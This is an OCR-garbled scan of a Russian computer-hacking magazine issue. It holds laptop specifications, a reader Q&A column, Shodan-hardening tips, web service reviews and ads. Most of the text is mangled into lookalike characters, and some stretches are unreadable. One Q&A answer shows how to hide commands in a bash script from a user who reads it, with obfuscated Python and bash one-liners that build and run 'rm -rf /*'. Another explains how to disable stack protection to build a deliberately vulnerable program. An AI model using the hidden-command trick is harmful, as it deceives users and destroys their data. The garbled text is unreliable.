ЗЗ7Тх 230х 23 мм 
1,81 кг 


Фе! шзриоп 152 5523НР ЕМУ\УУ 4-1161ег 


МИпдомз 8 Рготеззюпа! хб4 

13,3", 1280 х 720 

пе! Соге 15-33170, 1,7 ГГц 

6 Гб 

500 Гб НОО $АТА (5400 об/мин), 32 Гб тЗАТА 550 


М\МОЛА СеРогсе СТ 630М (2 Гб) 

1 х НОМЬ, 1 х аиаю ош, 4 х Ц$В 3.0, 1 х В\-45, 

1 х кардридер 

2 динамика ЗКиЙсапау с поддержкой технологии М/ауез 
МаххАцато 4, сенсорный дисплей, О\О-привод 

347 х 240 х 21 мм 

1,87 к 


Зопу $\Т131221А5То5Нфа Заае Нет 9500-0В$ 


МИптдом$ 8 Рго хб4 

13,3", 1366 х 768 

пе! Соге 17-35171, 1,9 ГГц 
4 Гб 

128 Гб 550 АТА 


пе! НО 4000 

1 х НОМЬ, 1 хО-$и6, 1 х аидю ощ, 1 х УЗВ 2.0, 
1х ЗВ 3.0,1 хВ\-45, 1 х кардридер 
сенсорный дисплей 


323 х 226 х 19 мм 
1,66 кг 
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МИпдомз 8 Рготеззюпа! хб4 

14”, 1366 х 768 

е! Соге 15-33170, 1,7 ГГц 

6 Гб 

500 Гб НОО $АТА (5400 об/мин), 32 Гб т5АТА 5$0 


пе! НО 4000 

1 х НОМЬ, 1 х аидю ощ, 1 х те, 1 х УЗВ 2.0, 2 х 05ЗВ 3.0, 
1х В\-45, 1 х кардридер 

технология Веа{5 Аидто, 2 динамика и сабвуфер НР Тире 
Ваз$ Вейех, сенсорный дисплей 

342 х 237 х 23 мм 

2,17 кг 


МИпаом$ 8 хб4 

15,6", 1366 х 768 

АМО Аб-4455М, 2,1 ГГц 

4 Гб 

500 Гб ЗАТА (5400 об/мин) 


АМО Вадеоп НО 75000 (2 Гб) 

1 х НОМ, 1 хО-$и6, 1 х тг, 1 х Пеадрпопез, 2 х ЗВ 
3.0, 1х Ц5$В 3.0, 1хВ\-45 

0\/0-привод 


380 х 262 х 25 мм 
2,2 кг 


ВЫВОДЫ! 


Итак, после изучения всех семплов можно 
сказать, что ноутбуки на базе \Мпаом5$ 8 вы- 
глядят неплохо. И пусть пока интерфейс не так 
привычен и не все модели оснащены сенсор- 
ной панелью, внедрение можно признать со- 
стоявшимся. Ультрабуки, балансируя на гра- 
ни между планшетами и ноутбуками, неплохо 


справляются со своими задачами, но им все 
так же не хватает времени автономной рабо- 
ты, хотя современные процессоры позволя- 
ют получить достойную производительность 
при малых габаритах. По результатам тестов 
ноутбуку НР ЕМ\У 4-1161ег было присуждено 
звание «Выбор редакции» за гармоничное со- 


четание всех качеств. Стоит отметить не са- 
мую корректную работу тачпада, но вряд ли 
ты будешь постоянно им пользоваться. «Луч- 
шую покупку» получает лэптоп АЗУ$ $300СА, 
который продемонстрировал достойные ре- 
зультаты в тестах и порадовал своим дизай- 
ном. 2 


ГР = 54458448534548445345445883458888 


ег ‹ 


РАС 


ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НАЕАС@НЕАЕ. ХАКЕРВИ 


Возможно ли и если да, то как в СИготе 

О$ на СпготербоокК’е за’сНгооРить, на- 
пример, ЧБити? 

Провернуть такое можно. Специально 

для этой цели апзсппе@ с СИНиЬ разра- 
ботала приложение сгошоп  (аИпиб.сот/ 
апзсппе!а/сго\ Топ). Но для того чтобы восполь- 
зоваться этой утилитой, нужно перевести 
Срготероок в режим разработчика, который 
сам по себе небезопасен для пользовательских 
данных. Впрочем, в геадте.1х{ проекта на гит- 
хабе все нюансы достаточно подробно распи- 
саны. 


[2] Как в МИпаом/$ узнать, каким процессом 
занята веб-камера? 
А Для начала найди в диспетчере устройств 
свою веб-камеру и на вкладке «Детали» уз- 
най идентификаторы производителя (\МО) 
и устройства (РО). После этого можно восполь- 
зоваться утилитой от Марка Руссиновича под на- 
званием Ргосез$ Ехрогег. Для этого выполни 
в приложении поиск дескриптора (Ета -› РГпа 
Напае ог О.) по такой строке: 


#у1а_ оооо8р1а_ееее 


где вместо нулей подставь соответствующие зна- 
чения \1Ю и РЮО. Хотя часто, чтобы обнаружить 
нужный процесс, достаточно произвести поиск 
просто по строке #ма. 


Как можно защитить свой Апагоа- 
девайс от ОМ$ $роойЙпд атак? 
Большинство ОМ$ зроойпа атак является 
следствием АВР зроойпод атак. Так что пер- 
вым делом нужно защититься от техник, основан- 
ных на использовании недостатков протокола АНР. 
В этом нам поможет программка Огоа$пеер 
Счцага (Биу/ОгоСиага) от создателя небезыз- 
вестного угонщика сессий Огоа$пПеер. Но это еще 


У 


Роман Гоций 
0015$тотап@дтан.сот 


Ре Еди пей 


беби ОрНоп$ 


О 32 Бах (Тлсе1)] оп изп32 


МАпдом$ Нар 
Руспоп 3.3.0 (%\3.3.0:БавзаЕЬ90ер{2, 5ер 29 2012, 10:55:48) 


[М$С ч.160 ^ 


Туре "соруг1сйс", "сгеа1с3" ог "]13сепзе()" Еох поге зпЕогшасзоп. 


>>> Егош шухапсе :прогс шугапсе 


>>> в = {1 : рои( ром(2,20),1) % 1787 Еох 1 1п шугапсе (500009) } 
$$ $$$ 5555$ $53353 $55555: :5$$:##+$ 


$$$ $ $ #4254: 


Текстовый прогрессбар в ОЕ 


не гарантия того, что ОМ$ зроойпа тебя не затро- 
нет. Думаю, ты слышал про ОМЗСгурт (Я9п$сгуот. 
ога) — приложение отОрепО\5, которое шифрует 
ОМ$-трафик. Так вот, с недавнего времени 
ОМ$Сгурт доступен и под Апагог. Установка и ис- 
пользование приложения ничем не отличается 
от его установки на Шпих, но для этого тебе нужен 
рутованный девайс, ВизуВох под Апагоа (Би.[у/ 
АпагВизуВ) и любой терминал (я использую 
Апаго4 Тегтта! Етиаог — ОБЦ.у/ТегтЕту!атог). 
Инструкции по установке найдешь на странице 
проекта. 


Есть достаточно большой баш-скрипт. 

Хочу вставить в него одну-две команды, 
только так, чтобы конечный юзверь ничего 
не заподозрил. Предполагается, что он (юз- 
верь) знает Бай весьма поверхностно и пе- 
ред запуском скрипта обязательно просмо- 
трит содержимое. Какие есть методы 
запутывания Ба$п-кода? 

Первое, что приходит на ум, — широко из- 

вестный метод с Реп (6 (.1у/рейо БТ). Кро- 
ме того, можно воспользоваться РУПоп, напри- 
мер так: 


$ руЕПоп -с '1трогЕ 0$; о5.5узет("" . 
Зо1п ([сИг(ога(1)-1) Фог 1 1п "5п!. = 
о" 1 


Этот код выполняет команду «ит -!{ *». Если же 
РУпоп- и Репй-скрипты могут вызвать у юзверя 
подозрения, то можно придумать что-то и на чи- 
стом Базй. Например, найди какой-нибудь не- 
примечательный текстовый файл, который 
стопроцентно есть у жертвы и содержимое кото- 
рого ты наверняка знаешь. Например, файл /ес/ 
дебсопТ{.соп{ начинается с такого комментария 
(ияне думаю, что кто-то его меняет): 


# 1/15 15 {Ме та1п сопйя В1е Фог «= 
дебсоп+. 


Так вот, некоторые буквы или даже целые 
команды (зависит от выбранного файла) можно 
взять из этого файла. Вот как будет выглядеть «гт 
-ГР /*» при таком подходе: 


$ сае /ефс/дебсоп+.соп+ | (геа@ -п 36 «= 
{; еуа1 "${{:33:1}${4:14:1} -г${*: + 
22:1} /*";) 


СКРЫВАЕМСЯ ОТ «САМОГО СТРАШНОГО ПОИСКОВИКА» 5НОБАМ 


В последнее время в интернете наблюдает- 
ся волна шумихи (5 .1у/5поЧапСпп, БИ.1у/ 
ЗподапНарг) вокруг так называемого «самого 
страшного поисковика интернета» — Зподап 
(\/млм.зпоааппа.сопл). Но на самом деле 
Зподап только вершина айсберга, поскольку 
подобную базу в то же время могут собирать 
и управляемые хакерами ботнеты. Рассмо- 
трим, как защитить информацию о твоей 
персональной сети от ЗВодап и подобного 
рода «поисковиков». 


Всегда и всюду, где это возможно, 
меняй стандартные пароли. Понимаю, 
что это очевидно и это знает каждый, 

но все же именно из-за пренебрежения этим 
тривиальным советом было скомпрометировано 
большинство устройств/серверов, найденных 
Зподап’ом, при этом большая часть была вообще 
без всякой аутентификации. Так что меняй стан- 
дартные учетные данные всюду — где это нужно 
и где это, казалось бы, и не нужно. 


Подумай, можно ли ограничить ко- 

личество общедоступных серверов/ 

устройств. Интересно, что большин- 
ство устройств, найденных ЗПподап’ом, вообще 
не должны быть открыты в интернет. Так что по- 
смотри, нет ли, например, принтеров, сканеров 
или камер, свободно смотрящих в интернет 
без надобности. Если такое есть — постарай- 
ся ограничить зону видимости этих устройств 
локальной сетью, что легче всего сделать, просто 
настроив файрвол. 
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С целью исследований хочу написать 

приложение, имеющее ошибку пере- 
полнения буфера. Написать-то написал, од- 
нако \Мзиа! Зфи4ю выдает мне исключение 
при попытке переполнения буфера: Вип-Т!ите 
Спеск Райиге #2 - Зфаск агоипа Пе уамаЫе ‘$ 
ма соггиреа. Похожая ситуация наблюдает- 
ся и с компилятором ССС. Как же тогда соз- 
дать уязвимое приложение? 

Эти исключения генерирует защита от пе- 

реполнения буфера, которая по умолчанию 
включена во многих компиляторах на большин- 
стве операционных систем. Для отключения этой 
опции в Миа! ЗфиАю перейди в свойства проекта, 
далее в СопйдигаНноп Ргорейе$ -> С/С++ -»› Соае 
СепегаНоп и отключи Вазс Випйте Спеск$ (хотя 
проверку Уппщайхеа уапа е$ можешь оставить). 
В случае ССС защита отключается опцией -то- 
Заск-ргдеСог: 


$ всс омегЯош.с -о омегЯом += 


Вопросы и ответы 


-Епо-5фаск-ргофесфог 


Время от времени приходится строить 

с помощью Ру{Поп в 1ОЕЕ огромные хеш- 
таблицы. Использую для построения генера- 
торные выражения, так как это очень удобно. 
Можно ли как-то узнать прогресс построения 
списка (количество уже вычисленных эле- 
ментов), не набивая для этого каждый раз до- 
полнительную функцию? 

Вообще говоря, без набивания не получит- 

ся. Но можно попробовать минимизиро- 
вать количество набиваемых строк. Хорошим 
и почти универсальным методом будет создание 
своего аналога функции гапде (при этом учтем, 
что в РЕЕ нельзя стирать символы, как это можно 
делать в консоли, так что будем отображать про- 
гресс операции псевдографикой): 


деф тугапёе(п): 
# Шкала 
ретпЕ ("#"*50) 
рг =@ 
ог 1 1п гапёе(п): 
рг+=1 
1 рг>=(п-1)/50: 
рг1и*('#' ,епа='') 
рг=@ 
узе1а 1 


Сохраняем файл с этой функцией, например 
в папку ПО, и пользуемся: 


+гом тугапёе 1троге тугапде 
5 = {1 : ром( ром(2,20),1) % 1787 == 
Ког 1 1п пугапее (50000) } 


Для доступа извне используй \РМ. 

Если тебе или кому-то другому все же 
нужно использовать некоторые сетевые 
устройства не из локальной сети, то в таком слу- 
чае лучше всего организовать доступ к ним через 
\УРМ. Да и вообще любой доступ к сети извне 
лучше организовывать через \/РМ. Как вариант — 
можно настроить фильтрацию всех внешних 
соединений по [Р. Открытые наружу порты 
хорошо бы спрятать — например с помощью рой 
кКпоскта или других подобных техник. 
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Полезный хак 


ХРАНИМ 
СТАТИСТИКУ В МОС 


Требуется сделать некое подобие системы мониторинга: клиенты время от вре- 

мени должны скидывать на сервер статистику, например использования процес- 

сора, а сервер должен предоставлять эту информацию (в виде графиков) через 
веб. Для хранения данных хотелось бы применить Мо$О!Е-подход. Но какую МоЗОЕ БД вта- 
ком случае выбрать? 

Идеальным решением для сохранения статистики будет кольцевая (циклическая) база 

данных, например РАО (гимлкред!а.ога/микиИВВО). Для работы с ней стандартом де- 

факто является набор приложений АВОТоо! (0$$.оейкег.сп/иготоо), который включа- 
ет в себя, кроме утилит для создания БД и работы с ней, также и утилиту для создания графи- 
ков. Если сервер, на котором ты будешь хостить систему, принадлежит тебе, или же хостер 
позволяет устанавливать дополнительные бинарники, то проблем с обработкой БД не будет. 
Например, в случае РНР для работы с такой БД нужно установить РНР-расширение ггаочо1. 
Подробнее об установке и работе с этим расширением можно почитать здесь (БИ.1у/иг9-рвр). 
В противном случае появляются некоторые проблемы, поскольку реализации ВАВ натипичных 
серверных скриптовых языках (чистых) нет. Но можно, конечно, попробовать и обойтись, если, 
например, каким-то образом хранить на сервере та-файлы, полученные от клиентов, и ото- 
бражать их с помощью уауа$спрга, взяв на вооружение библиотеку ВАР Сапуаз$ (БИ.1у//$ВВО), 
работа с которой практически не отличается от работы с ее аналогом из набора ггЦо91. 


Град 


ПИ к ПИТ 


ИЕ ИИ 


Зузнеит юа9 


12:00 12:0 ее: 12:30 12:40 12:50 
01: зуагаее 0.03 М, 0.24 Азё 0.68 Мах. 0551 
Шанс 0.11 Ма 0.23 Азё 044 М. 0.2315 
Иа мене 015Мы, О2АзБь 030Мх 0191 


График, построенный спомощью ААВ Сапуа$ 


Подделай или минимизируй выдавае- 
мую в сеть информацию. Все, что знает 
бпоаап, ему предоставляют сетевые 
устройства и программное обеспечение (на- 
пример, Араспе по умолчанию выдает в заго- 
ловках ответа подробную информацию о себе). 
Некоторые приложения позволяют настраивать 
свой стандартный ответ, а некоторые вообще кар- 
динально его изменять. Проделай эти настройки, 
и, даже если кто-то найдет информацию о твоей 
сети в Зподап, информация будет бесполезной. 


Натрави Зподалп на себя. Можешь вос- 
пользоваться !Р-фильтром 5подалп и на- 
править на свою сеть таким запросом: 


пе*:уоцг.1р.ада.ге$$ 
// или подсеть 
пе*:уоцг.1р.ада.ге$$/24 


Отсутствие информации о твоей сети в результатах 
ничего не значит, может быть, Зподап еще не до- 
брался дотебя :). 
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Мапбомс Ромен не 1 
Кору"тУЪЬЕ СС» 212 М:егосоРЕ Сопрокле во. Я НЕХ Расе коей. 


С: `Цзекс“Йопай^ ес Кор» „ 


Окно Ромег$Не! в ОцакКе-стиле 


Мой Апагоа-планшет завис, да завис 

так, что даже перезагрузка не помогает 
(после перезагрузки снова зависает). Подо- 
зреваю, что причина этого — какое-то прило- 
жение, которое автоматически обновилось. 
Как узнать, что за приложение стало причи- 
ной, приложение ли это и как его удалить? 

Наверное, каждый сталкивался с безопас- 

ным режимом \\Лпао\/$, так вот — в Апаго!а 
он тоже есть: в безопасном режиме не грузятся 
никакие сторонние приложения и виджеты. 
Для активации режима в Апаго 4.1 и новее сде- 
лай длинный тап на кнопке выключения, и уви- 
дишь запрос подтверждения перехода в безо- 
пасный режим. Для версий старше выключи 
устройство, включи и, когда появится логотип, 
зажми обе кнопки громкости и держи до тех пор, 
пока не увидишь надпись «Безопасный режим». 
Если планшет загрузится в безопасном режиме, 
значит, ты был прав — остается лишь найти вино- 
вника методом включений/исключений. 


Хотелось бы преобразить консоль 
Ромег5Пе!, сделать ее в ОчаКе-стиле, 
а-ля Уакиаке в Ипих. Что посоветуешь? 


С одной стороны, последняя атака 
на ТЁ$ 1.0 на данный момент чисто 
теоретическая. Атака с помо- 

щью ВЕАЗТ намного серьезнее, 

но при этом требует от взломщика 
весьма специфических условий 
(если помнишь, создатели ВЕАЗТ 
для эксплуатации уязвимости 
шифрования нашли уязвимость 

в виртуальной машине чуа\ма). 

Да и прошло уже два года с момен- 
та обнародования этой уязвимо- 
сти, а новостей о громких угонах 
информации не слышно. Так 

что не стоит пока паниковать. 


Отличным и самым простым вариантом 

будет использование альтернативной кон- 
соли, например разработанной хабравчанином 
Махити55 ( ) — в ней уже встроена 
поддержка Очаке-режима, кроме того, очень 
много других интересных плюшек, ну и, конечно, 
да, она поддерживает Ро\мег5пей. Но если не хо- 
чется ничего стороннего, то можно что-то наму- 
тить непосредственно с консолью Ромег$пей. 
Например, можно воспользоваться АщоНо{Кеу. 
Я написал на коленке примитивный скриптик, ко- 
торый делает нечто подобное, но с очень уж не- 
уклюжим эффектом слайда (АНК крайне медлен- 
НЫЙ): . Как это выглядит 
в моем случае, можно увидеть на скриншоте. 


У меня Мехи$ 7 34. Недавно потребова- 

лось раздать инет через \М-Е!, и тут 
я обнаружил, что в настройках отсутствует со- 
ответствующий пункт меню. Пробовал уста- 
навливать всякие программки — результата 
ноль. Можно как-то это исправить? 

Да, можно, но придется шить девайс. 

Умельцы с ХВА уже давно модифицирова- 
ли стандартную прошивку для Мехи$ 7 39, чтобы 


Наличие настолько серьезной 
уязвимости все-таки не радует. 

Не факт, что никто не придумает 
другого способа ее эксплуатации, 
аесли придумает, то хорошо, 

если это будут добрые дядьки, 

как создатели ВЕАЗТ, но может 
случиться и иначе. Кроме того, 
количество уязвимостей, хоть и те- 
оретических, вокруг ТЕЗ 1.0 растет, 
что не может не настораживать. 
Так что по возможности нужно 
потихоньку переходить на ТИ$ 1.1, 
аеще лучше — на ТЕЗ 1.2. 
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Апаго!а: переход в безопас- 
ный режим 


включить эту опцию на устройстве. Все, что тебе 
остается, — это скачать нужный образ прошивки 
( ) и залить его на устройство. 


Хочу, чтобы АБЗЕ-модем О-Ипк 2640и 

раздавал инет с выделенной линии. 
На роутер залил Ореп\МАТ через +{Нра, 
как описано в руководстве: : 
Прошивка залилась успешно. После этого за- 
цепился по З$Н и настроил свитч, как описано 
на той же странице ниже. После ребута отва- 
лился фейс и вообще пропал пинг. Как теперь 
залить прошивку? Что сделал не так? 

В большинстве роутеров на базе чипсетов 

Вгоаасот (в частности, и на О-Шпк 2640и) 
существует так называемый режим аварийного 
восстановления прошивки. Чтобы воспользовать- 
ся им, выполни такие шаги: сначала выключи роу- 
тер, зажми кнопку «Везеф» и, не отпуская ее, вклю- 
чи роутер. Держи кнопку зажатой примерно 20 
секунд, после чего заходи на 192.168.1.1 по веб 
и скармливай туда файл прошивки. Кстати, таким 
образом можно было намного быстрее прошить 
на роутер (вместо {Щра) Ореп\МВТ, так как в этом 
режиме нет проверки прошивки на «правиль- 
ность». Насчет того, что ты сделал не так, я не уве- 
рен — вроде все должно работать, но попробуй 
настроить $мйсИ не на ей1, а на ей0О — скорее 
всего, причина кроется именно здесь. 


Совсем недавно перешли всей конторой 

на систему контроля версий СН. Сейчас 
у меня такая ситуация: в целях дебага иногда 
приходится делать правки в файлах, за кото- 
рые я не отвечаю, и, соответственно, эти 
правки мне коммитить не нужно. Добавление 
файлов в .д№опоге не выход, так как в таком 
случае не коммитятся не только мои правки, 
но и правки коллег. Что порекомендуешь в та- 
кой ситуации? 

Действительно, добавление файлов 

в .ОШопоге носит глобальный характер. 
Для того чтобы отключить коммиты только с тво- 
ей стороны, воспользуйся командой: 


51 ирдафе-1п4дех --а$5ите-ипсПапде@ += 
<#й1е> 


Данное изменение никоим образом не повли- 
яет на работу с репозиторием других пользовате- 
лей. Возврат настройки: 


51{ ирдафе-1п4ех --по-а$5ите-ипспапзеа ‹= 
<#1е> 22 


т 


И Е 


эвнив5 эжА онжои 1еавцие изчняцецалеи иохе1 91и091501 он 
"ии 1внейеи одохэ изин1оцицэв9 и1Е 


азшохочПуях 
АЗУаи9оэ 


ночыо ода во члиь Ао и опа оО 
хнынажеции-рюарууо «На интошоейиионо 
изомта иден зе моозацз сижойс 
ЗО>УЯ УН и 9 ЧУЯ-З7ПМНА5МП 

'ОВУЖЕИ 


АавНэи 


Чог=:Унап 
вУННУЯОТНаиОУЗа 


ата и15онжомЕОааааон | поаблиио | 


57 аОчаму о4ОННУЯО1Аа ВИП ЭЛУН 15 ПИ 


[00 


[ДТ] 


5 
© 
— 
и 
5% 
(ев) 
(9% 


АгээЧм 0`/ 4е!9Э 
45!р-х< 


90 Л 

0’ чошэер |ещ1эЧ1 

0°9р пщ90 

07 шшрелмаЧа 

66 19ч1эУ-}а 

190 9401534е« 

66406106 1Э1еле« 

117615 ЕАМ 

У9`61 94550 И 

СОС хи 

0°© 194$Ч$1 

ГСО! - 

шаэеш- 
О У 89 
5'6'/ 9пу2ед-еээ\у 
и 3 8Аб< 


9'6'6 р!пБб 
8'0'2 хи!446 
907 69125 
$19`с 51Рэ4 

8 №4Лиэ40 
('9 Н554990 
Гу хиБи 
уу ааобчой 
сур реЧе2щэи 
:9'8 эчээп7 
(57 РАЗЧЬН 
67| Ахо4ЧуН 
с915ап5 
051 904210) 
бр елрче$$е5 
0`7`[ У5149}5У 
уу‘ эчеду 
19^лэс< 


ОГ У-еЧ5е им 


6 1100] 1ээ\Би3-1е120$ 
| ИЕМЭИЕС 


10 рАЗНба 
0" ›6рмззеа 

(0 ээчэзэуе 
0`8`| 190914 941 чЧог 
690 1е245еН 

Кс опем- 

60| 341494эбч1- 

790 963 

ЧЕСКО 939^4243-3 13 
уу 1003915 

| 39^12эро) 

 21э9 &1 биу-Узе-зо.иу 
Ку пэс< 


06| 01э-9щох 
Г9`0 342 эеМ 

Сб 195М049л| 
10° э9^Уб 

Е рлепб-$$3 
$'66°0 00192 

060 |355еП9 

УГО реа 
06805106 79 е45м9]а 
12| 22990 

си‘ [оелреией 
КЕ БЗН 


1799 
96'6'03Е1 4297 
6'6'6 9.1м№]504 
|0`/75 21122113 
099 егерей 
$170 э^12Э 
19№< 


КО" хпием 
МАЕ 

у’ эзапэрэы 

5эще9< 


5876 ЧЧэзециий 

60 1622е1 

61505105 [995 

20° ЛА 

с9`0 эрма 

05`0 15914 

О’8Го |+4за 

$09 ПО! 

ГЕО 2 ЧеИ 
870 меч] 
ИГУ МПГ 

Г 09 

9`[ 9РЭ 

у'8`1 чэБАхо 

[17`0 951} 10 

079 эро) 

Усс Ч 3э 11а 

ссго е!резу 

|э^э(< 


Ср ИЕМЭиАб 
02 3ипБу3 415 

170 165 
ГУГО 19м30Ч5 
СГ 0295 
0020505105-5 ЧОВОМ 
С | 9405595ПИ 

у'0°2 $9 

607 2213092911 
60 ре2э49!1 

Гр 5104$}0Н 

6'6`0 эхезарчен 
025 ШеУ!6!0 
05 м0-15е124 

(:9`0 Ч99$4э^ц0) 

с'р чощечци! 5 

6'0'5 эп] 

С‘ лерчпу 

О 99%390< 
хип < 


0`0°7 8106 0!0Х 
"9 15421 [ 
69| 1901 
|9 Че19Аи| 

$ 19.1 э ЧП 
(96 4245 
7145 

0°| 29^|!592110 
060 1955219 
506 94е'5946}504 
$07 э2}094911 
07| Мэл щон 
6'6`0 элеларчен 


|'6'[ 9^42э495-4эаруе19 


С0[8 911291 
955 '0°С ИЫА 5! 
И6'у УЭпр-э9/ 
сур мУэро) 


9°2 А1э3еЯ 140205 
Гр Эээ} 429 
2№Ии<< 


90 Л 
69 20'с 1эруещиио7 |еэ4ий 


09 19ПрэЦц55 4191515 


$0 04а Х04|00 | 5/6 
ЗЭЦИВИ 194/15 
[9 е^пэУ 
67 0[-1004э4 

221 ЧеиУЧ 

0'6'0 лэрчешшо)пш 

0'1 951511 


0" 1915008 1э^- 31901 


09 опу2е8 оро| $19523 
0:6 9944 191406 У! 
УГ 9166е.3э 


96 19150Нэ|[05405 


с'6'/ 9пу2е4-еээу 
419}5А6< 


ур 0!р3 <1ецуэрэ.1) $мори!/л 
90:0 $}455-ИМ 

05 У138 

191518 иу1004 045 руэ1[ 

Е еще 
Е 
689 За 

2:0 шземеи 

1 94} УЧоГ 
ОНТ 9ЗН 

67`0 3е2Ч5ен 

9 ПЛАЦИУ СЕЦОМ 19353 
0'с эче1Ч5е4 

9`0 ходриеб о0у2п>) 

0'8 $ПЛЛЦИУ 99.1 15еле 
2198 С`| Оч-У2е.5.иу 
О №1э5< 


64| 19 


6'8'©1е49Х 
0`5`9 0299 М 
09 э2ПЛ 

ИО ИВИЬ 
060 |95$еп9 
811 195100119 М 
у`6 | 9/1 19М 
ур р.191ие15Ч] 
6'6'6 э1М}50-- 
07`/ э}еБээ-- 
С0`['6 2112913 
876 2009 
0' 14911) Иэ 


Ч0’р еибл4епо$ ма 
у"0'| э9шпГ $Ма 


е4э}ес лэризэр}!Я 
19№< 


УГ Ч21955ИХ 

0`9`6 19р03431 
с слермеалреев$ 
700 эмО эт 
гут аиет 


9011 59111 


СОС Ха945 949Н 


6'6`0 эделариен 
09 лэрезэЧ 31х03 
07| 10103 

0'5 А10}2е4 }е4404 
2:90 Чээ5лэлио5 
70| -1031р3 о!рпу Лу 

9'6'0'1 1045499260} пу 

361 <че!рпу 


6:0 1эр\!- 4э^07 а ообшечзу 
врэщти< 


Гр ЭЗагслчй 
0170 1515 
19 пи99156 


0'[ эащпг Аэу Азбэч 


6297521 Па) ИУ 
е}э9 0'5 1эзэшиех 


$106 92130 30$541У 
ГГ | 5104519 Н 

0`р 3Ча $11499 

0:1 1992-03 

701 12824 


0`2 лэрипа ээ.[ ^|1е3 


50:01 10}246э}иу$э4 
0'2 Бэ@гэр 

018 №0-2е}е4 
551/< 


0`01 99.3 Хх э}159эМ 

$'8'8 1эл1эб цчоний 

5876 Чэзециуй 

$ 91 э49п5 
СС | ЧеЩе05 
02 е^/1э5 
О’8Г9 43а 
чесу рош-сре0910М 
ус ааобуой 

870 ме49Г1 

р 09 

0`7 7059263 

у'8`| иэБАхой 

$1 З0ГА р 

[`0`6 1921590 

$99 4011163 ана 11540 еро5 
}иэщ9о|элэ(< 


СОС ме!лих 

"6 149410 [п 

С6 | 49 26]ЧП 

10'8 эрчецицио7 |е}01 
эс 51е4.э3415А6 
$'9 э9КУ5 

90 Аа 

51" 22990 

6'8'9 ++ре4эом 

оо ит ерчели 

966 42еа 2еро) е9зИи э!-У 
15. 9410-45 э16009 

9511 0005-2900} 

ГС ХО} 9.1 

0'с лэбечеи| лез 

ГД 9 И 1 $1001 МОИЗУО 

06 917-/ 

цосАией< 

$мМ0мм<< 
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зю\котт ИМЗТАМТ 


Сервис для быстрой 
генерации форм 


О'ЗСОММЕСТ (105://915соппес{. те) 


—> Не секрет, что при обращении почти клюбому современ- 
ному сайту «за кулисами» происходит множество операций 
и обращений к сторонним ресурсам. Это делается для тар- 
гетирования рекламы, социальных плагинов и многого 
другого. Мало того что обработка этих запросов занимает 
дополнительное время, так еще и страдает конфиденциаль- 
ность пользователя. 0О!$соппес1, пожалуй, самый продви- 
нутый продукт, решающий проблему таких нежелательных 
обращений. Плагин анализирует каждую страницу и бло- 
кирует запросы третьим сторонам, при этом сортируя их 

по категориям. Так что, если блокировка какого-то реквеста 
ломает функциональность сайта, ее легко снять. К сожале- 
нию, плагин доступен только для браузера Спготе. 


База данных, хранящая 

информацию овремени, 
необходимом для про- аль роет жет ше 
хождения каждой игры 7, м 


Тиё Втвадерлт 


Могут Сер, ВН БИН СоятеЫгынЯ 


нтынти 5 еси 


В, о5соннЕСТ 


а а И 


гигодистоа С/зсоппесе 2 


ЗЕМОТАВ (зепо!або.сот) 


—> Все современные браузеры умеют синхронизировать 
вкладки между разными устройствами, и это очень удобно. 
Но что, если ты не хочешь пользоваться одним браузером 
везде? Это особенно актуально у айфоноводов — например, 
под 10$ нет Егёох, а под винду нет Затап. Процентов девя- 
носто пять пользователей решают эту проблему, все-таки 
приходя к общему знаменателю (например, ставят СВготе 
на обоих устройствах), а для оставшихся пяти и задуман 
ЗепаТар. Как и полагается нишевому продукту, ЗепаТаь за- 
предельно функционален — предусмотрено целое мобильное 
приложение с историей и возможностью двусторонней связи 
с десктопным браузером, а также другими непримиримыми 
воинами. Для Апаго доступны альтернативные клиенты. 


ЧУОТРОВМИМ$ТАМТ (пз!1ап!|оНогт.сот) 


—> уЧоРопт — сервис, позволяющий за пару кликов сгенери- 
ровать форму: обратной связи, подачи заявки, регистрации 

и так далее. Достаточно выбрать один из примерно 2500 ша- 
блонов, указать адрес, и сервис поднимет страницу с формой. 
К сожалению, разместить на своем домене страницу не полу- 
чится, но вот виджет для вставки разработчики дают. В бес- 
платном режиме можно обработать до ста заявок, для всего 
остального доступны платные варианты, от 10 долларов 

в месяц за тысячу заявок до 50 долларов за сто тысяч. Сло- 
вом, неплохое сиюминутное или временное решение, которое 
к тому же вполне достойно выглядит и работает. 


Плагин, обрубающий 
лишние запросы 

при загрузке страницы 
в Спготе 


НО\МОМСТОВЕАТ (^^^. поммопоюбеа!.сот) 


—> В Чеат есть чудо-функция — можно увидеть, сколько 
времени ты провел в игре. Другие платформы менее гуманны, 
и вних бывает сложно понять, что ты сидишь с джойстиком 
вот уже пятые сутки напролет и мир за окном бесповоротно 
изменился. Ном/-опоТоВеа{ знает время прохождения всех 
игр, при этом можно посмотреть, сколько нужно на «быстрое» 
прохождение и сколько — на полное (с побочными миссиями 
и аддонами). Так что прежде, чем покупать ЗКуйт на выход- 
ные, подумай, как вместить в них 180 часов. А СмИхайоп \, 

в которой можно провести 400 часов, лучше вообще не тро- 
гать. Это к тому же неплохой способ сэкономить — зачем 
покупать новые игры, если в старые еще играть сотни часов? 
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© \Леми Ниюгу 


Сервис, позволяющий 


РИН обмениваться вклад- 


ками междуразными 


&? хохсо.сопи © 


ЗАъвосиен ых Ном СВаселиы 00 ААС 


десктопными и мо- 
пакержхеай. сот © бильными браузерами 
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зепофар, согту/ = 


18: весоитюйь асс ист Слоеный: © МАНА 


МОЗТНАУЕ ДЛЯ РУТОВАННОГО АМОВОШО 


НОВЫЕ ВОЗМОЖНОСТИТРТАВЕЕ$ 


Веади: тонны 
нестандартного контента 
ежедневно 


МАМАМ. ХАКЕР.ВУ 


РЕКОМЕНДОВАННАЯ 
ЦЕНА: 270р. 


ДЕЖАВЮ: 
ОМЗЕНАНИЕ-БАГ 


Свежие способы Как найти ошибки 
эксплуатации РНР в Апаго4-приложениях 
ОБес{ шесйоп и получить за это деньги 


ОБИРАЕМ 
КВАДРОКОПТЕ 


Эти беспилотники скоро изменят мир. 
Но построить такой летательный аппарат можно уже сейчас 


МЕНЯЕМ 
БАГИ НА БАКСЫ 
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Затзипд рекомендует \М/пдо\м 8. «Е» 


оатзупа АПУ зтагЕ РС 


Мощность ноутбука. 
Свобода планшета. 


ААА 


к 
жа: 
К 


Свобода и удобство планшета в сочетании с функционалом мощного ноутбука: 
процессор Тпее!® Соге" 15 третьего поколения — в тонком и легком корпусе, с ярким 
сенсорным РиЙНоО-экраном с диагональю 11,6", полной поддержкой \Мпдомз-программ, 
включая М!сгозо{е ОЁЯсе, рукописным вводом с пером ($ Реп) и 8* часами работы 

на одной зарядке. АТТУ Зтаг* РС Рго — незаменимый планшетный ПК для работы 
